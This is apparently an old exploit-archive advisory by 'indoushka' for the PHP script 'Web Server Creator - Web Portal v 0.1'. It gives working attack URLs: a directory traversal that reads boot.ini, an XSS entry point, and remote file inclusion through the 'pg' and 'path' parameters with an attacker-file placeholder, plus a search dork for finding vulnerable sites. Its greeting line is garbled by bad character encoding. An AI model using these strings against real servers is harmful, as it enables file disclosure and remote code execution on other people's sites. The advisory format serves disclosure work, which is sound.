[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Web Server Creator - Web Portal v 0.1 Multi Vulnerability
# Published : 2010-02-24
# Author : indoushka
# Previous Title : Softbiz Auktios Script Multiple SQL Injection Vulnerabilities
# Next Title : PBBoard Version 2.0.5 Mullti Vulnerability
========================================================================================
| # Title : Web Server Creator - Web Portal v 0.1 Multi Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Web Site : http://www.comscripts.com/scripts/php.web-server-creator.1082.html
| # Dork : All right reserved 2002-2003 (MSN/Web Server Creator)
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)
| # Bug : Multi
====================== Exploit By indoushka =================================
# Exploit :
1- Directory traversal (Windows)
http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini
2- XSS
http://127.0.0.1/1082_webserve-01/index.php?pg=forum
3- RFI
http://localhost/1082_webserve-01/index.php?pg=[EV!L]
http://localhost/1082_webserve-01/news/form.php?path=[EV!L]
================================ Dz-Ghost Team ========================================
Greetz : óí?í èáúè?ó + úí? ?áè?? + ?á??? ?áúí? K10 + K@MEL + úí? ?áíáé + ê??íY
-------------------------------------------------------------------------------------------